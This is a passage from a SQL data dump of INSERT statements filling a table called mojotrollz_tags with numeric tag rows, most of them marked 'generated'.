`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1423, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1424, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1424, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1425, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1425, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1426, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1426, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1427, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1427, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1428, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1429, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1430, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1431, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1432, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1432, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1433, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1434, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1435, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1435, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1437, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1437, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1439, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1439, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1440, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1440, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1441, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1442, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1443, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1443, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1444, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1444, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1445, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1445, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1446, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1446, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1447, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1447, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1448, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1448, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1449, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1449, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1450, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1450, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1451, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1451, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1452, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1452, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1453, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1454, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1456, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1457, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1457, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1458, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1459, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1460, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1461, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1461, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1462, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1462, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1463, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1463, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1464, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1464, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1465, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1466, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1469, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1469, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1470, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1470, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1471, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1471, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1472, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1472, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1473, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1473, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1474, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1474, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1475, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1476, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1476, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1477, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1477, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1478, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1478, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1479, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1479, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1480, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1481, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1482, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1482, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1483, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1483, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1484, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1484, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1487, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1487, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1488, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1488, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1489, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1490, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1490, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1491, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1491, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1492, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1492, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1493, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1493, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1494, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1495, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1496, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1497, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1497, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 1, 32, 5, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 1, 33, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1498, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1499, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1499, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1500, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1500, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1501, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1502, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1502, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1504, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1505, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1506, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1506, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1507, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1507, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1508, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1509, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1511, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1512, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1512, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1513, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1513, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1515, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1515, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1516, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1518, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1518, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1519, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1519, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1520, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1520, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1521, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1521, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1522, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1522, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1523, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1525, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1525, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1526, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1526, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1527, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1527, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1528, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1528, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1529, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1529, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1530, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1530, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1531, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1531, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1532, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1532, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1533, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1533, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1534, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1534, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1535, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1535, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1536, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1536, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1537, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1537, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1538, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1538, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1539, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1539, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1540, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1540, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1543, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1544, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1545, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1547, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1548, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1549, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1550, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1551, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1552, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1552, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1553, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1554, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1555, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` 